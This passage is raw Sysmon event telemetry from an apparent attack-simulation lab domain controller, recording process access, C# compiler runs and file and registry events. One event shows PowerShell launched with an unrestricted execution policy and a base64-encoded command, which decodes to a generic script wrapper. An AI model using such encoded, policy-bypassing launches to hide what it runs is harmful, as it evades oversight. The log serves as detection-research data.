exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000152Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.352{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000151Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.352{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000150Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.352{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000149Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.352{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000148Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.352{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000147Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.351{5D479F2C-1678-5F84-FD02-000000007E01}4140C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESD384.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSCD845E8C4A0CD4853B5D24317EE8DC8DD.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{5D479F2C-1677-5F84-B55C-110000000000}0x115cb50HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{5D479F2C-1678-5F84-FC02-000000007E01}4296C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\bqwsc4ag.cmdline" 10341000x8000000000000000146Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.337{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000145Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.337{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000144Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.337{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000143Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.258{5D479F2C-1677-5F84-F702-000000007E01}43642676C:\Windows\system32\conhost.exe{5D479F2C-1678-5F84-FC02-000000007E01}4296C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000142Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.258{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000141Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.258{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000140Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.258{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000139Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.258{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000138Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.258{5D479F2C-14FE-5F84-0500-000000007E01}6402464C:\Windows\system32\csrss.exe{5D479F2C-1678-5F84-FC02-000000007E01}4296C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000137Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.258{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000136Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.258{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000135Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.258{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000134Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.258{5D479F2C-1677-5F84-FA02-000000007E01}46762348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5D479F2C-1678-5F84-FC02-000000007E01}4296C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+7c1edb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+7c19a9|UNKNOWN(00007FF9E2E9B68F) 10341000x8000000000000000133Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.258{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000132Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.258{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000131Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.232{5D479F2C-1678-5F84-FC02-000000007E01}4296C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\bqwsc4ag.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{5D479F2C-1677-5F84-B55C-110000000000}0x115cb50HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{5D479F2C-1677-5F84-FA02-000000007E01}4676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 11241100x8000000000000000130Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.227{5D479F2C-1677-5F84-FA02-000000007E01}4676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\bqwsc4ag.cmdline2020-10-12 08:40:24.227 11241100x8000000000000000129Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.localDLL2020-10-12 08:40:24.227{5D479F2C-1677-5F84-FA02-000000007E01}4676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\bqwsc4ag.dll2020-10-12 08:40:24.227 13241300x8000000000000000287Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-SetValue2020-10-12 08:40:25.977{5D479F2C-1679-5F84-0203-000000007E01}4308C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Sysmon/Operational\MaxSizeDWORD (0x12d2c000) 10341000x8000000000000000286Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 